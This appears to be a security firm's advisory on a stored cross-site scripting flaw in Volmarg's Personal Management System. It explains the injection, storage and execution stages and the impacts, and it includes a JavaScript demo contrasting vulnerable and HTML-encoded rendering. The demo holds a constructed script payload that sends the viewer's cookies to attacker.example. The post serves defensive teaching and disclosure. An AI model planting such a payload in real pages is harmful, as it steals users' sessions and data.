Product Name: PMS by Volmarg
Vulnerability: XSS
Vulnerable Version: Will be disclosed soon
CVE: Will be disclosed soon
On February 28, 2024, our team of pentesters at Astra discovered a critical stored cross-site scripting (XSS) vulnerability in the Personal Management System by Volmarg, a web-based tool for creating to-do lists, taking notes, and managing files from a single dashboard.
Stored XSS, also known as persistent or second-order XSS, occurs when an application saves user-supplied data without validating it and later renders that data into a page for other users without encoding it, so the browser treats the stored text as markup or script rather than as plain content.
How does a Stored XSS Vulnerability Occur?
Stage 1: Injection
An attacker introduces malicious code into the application’s data. This can be done in various ways, such as:
- Input fields: Injecting code into forms, search boxes, or other input fields.
- Uploading files: Embedding code within uploaded files, for example HTML or SVG files that the application later serves inline.
- Modifying database entries: Directly altering stored records to include malicious code, which requires that the attacker already has write access to the database or to an administrative interface.
Stage 2: Storage
The malicious code is kept in the application's persistent storage, such as a database, the file system, or server-side session data, and remains there until it is removed.
Stage 3: Retrieval and Execution
When any user visits a page that retrieves and displays the stored data, the malicious code runs in that user's browser within the application's origin, with that user's session and privileges. This can lead to a variety of harmful consequences, including:
- Stealing cookies: The attacker can obtain sensitive information like session tokens or user credentials.
- Redirecting users: The attacker can redirect users to malicious websites.
- Executing arbitrary code: The attacker can run arbitrary JavaScript in the victim's browser in the context of the application, so any action the victim can perform in the application, the script can perform too.
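The three stages above, walked through in code. This is an added example written for this article, not code from the Astra advisory or from the PMS project: it uses a constructed in-memory note store, made-up user names and a constructed payload, and it does not reproduce the undisclosed injection point in PMS. The same block also shows the output encoding (HTML encoding at render time) that we recommended to the developers as the fix.

```javascript
// Added example (not code from the Astra advisory or from PMS): a minimal
// simulation of the stored-XSS lifecycle on a note-taking dashboard.
// The store, users and payload are constructed for the demo.

// Stage 2 stand-in: a server-side store shared by every user of the app.
const noteStore = [];

// Stage 1: a user submits a note. The vulnerable application stores the
// input verbatim; nothing is validated or sanitized on the way in.
function saveNote(author, body) {
  noteStore.push({ author, body });
}

// Stage 3, vulnerable: the dashboard builds HTML by string concatenation,
// so whatever was stored is emitted as markup in every viewer's browser.
function renderNotesVulnerable() {
  return noteStore
    .map((n) => `<li><b>${n.author}</b>: ${n.body}</li>`)
    .join('\n');
}

// Fix: HTML-encode the five characters that can change parsing context in
// an HTML body or inside a double- or single-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Stage 3, hardened: the stored data is unchanged, but it is encoded at
// the point of output, so the browser renders it as text, not as script.
function renderNotesSafe() {
  return noteStore
    .map((n) => `<li><b>${escapeHtml(n.author)}</b>: ${escapeHtml(n.body)}</li>`)
    .join('\n');
}

// Crude stand-in for the browser: does the markup contain a script element
// or an inline event-handler attribute that would execute on load?
function containsActiveScript(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

// Constructed scenario: the attacker saves a note whose body exfiltrates
// the viewer's cookies; a second user later opens the shared dashboard.
const payload =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

function demo() {
  noteStore.length = 0;
  saveNote('alice', 'Buy milk');
  saveNote('mallory', payload);               // Stage 1: injection
  const vulnerable = renderNotesVulnerable();  // Stage 3 as the victim sees it
  const safe = renderNotesSafe();              // same data, encoded on output
  return {
    vulnerableExecutes: containsActiveScript(vulnerable),
    safeExecutes: containsActiveScript(safe),
    safe,
  };
}

const result = demo();
console.log('vulnerable render executes payload:', result.vulnerableExecutes);
console.log('encoded render executes payload:   ', result.safeExecutes);
console.log(result.safe);
```

The point to take from the hardened version is that encoding belongs at the output boundary, chosen for the context the value lands in (here the HTML body); sanitizing on input alone is fragile because the same stored value may later be emitted into an attribute, a script block or a URL, each of which needs different encoding.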
Impact of Stored XSS Vulnerability
1. Data Theft and Session Hijacking
- Cookie Stealing: Malicious scripts can read any cookie not marked HttpOnly, including authentication tokens, and send it to the attacker, who can then log in as the victim.
- User Information Exfiltration: Personal data visible to the victim, such as names, addresses, and financial details of the victim or of third parties stored in the application, can be read from the page or fetched through the application's own API and sent to the attacker for identity theft or other criminal use.
- Session Hijacking: Even when cookies cannot be read, the script runs inside the victim's authenticated session and can issue requests on their behalf, performing unauthorized actions as that user.
2. Malware and Ransomware Propagation
- Malware Downloads: Such scripts can start file downloads or redirect the victim to sites that serve malware, such as trojans or spyware, onto your devices and networks.
- Ransomware Deployment: Attackers can use stored XSS as the first step of a ransomware campaign, luring the victim into running a downloaded file or sending them to an exploit page, after which ransomware encrypts your data and demands a ransom for its decryption.
- Browser Exploitation: The injected script can load exploit code that targets vulnerabilities in the victim's browser to deliver malware payloads, bypassing security measures.
3. Website Defacement
- Content Alteration: Malicious scripts can modify the content of your web pages, replacing legitimate content with harmful or misleading information.
- Layout Changes: Attackers can manipulate your website’s layout and appearance, making it difficult for users to navigate or identify malicious content.
- Unwanted Ads: Compromised scripts can inject unwanted advertisements or pop-ups onto your web pages, disrupting the user experience and potentially damaging your website’s reputation.
Current Status
Upon discovering the vulnerability in the Personal Management System, we promptly notified the platform's developers and provided possible solutions, such as validating input on the server, HTML-encoding user-controlled data at the point of output, and related hardening, that they can implement to prevent exploitation against user data.
Currently, they are working on implementing a patch while formulating a long-term solution for the vulnerability.
What can you do?
Update to the patched version as soon as the Personal Management System team releases it. Until then, limit the accounts that can create content in your instance, since the issue is exploited through data that one user saves and another user views.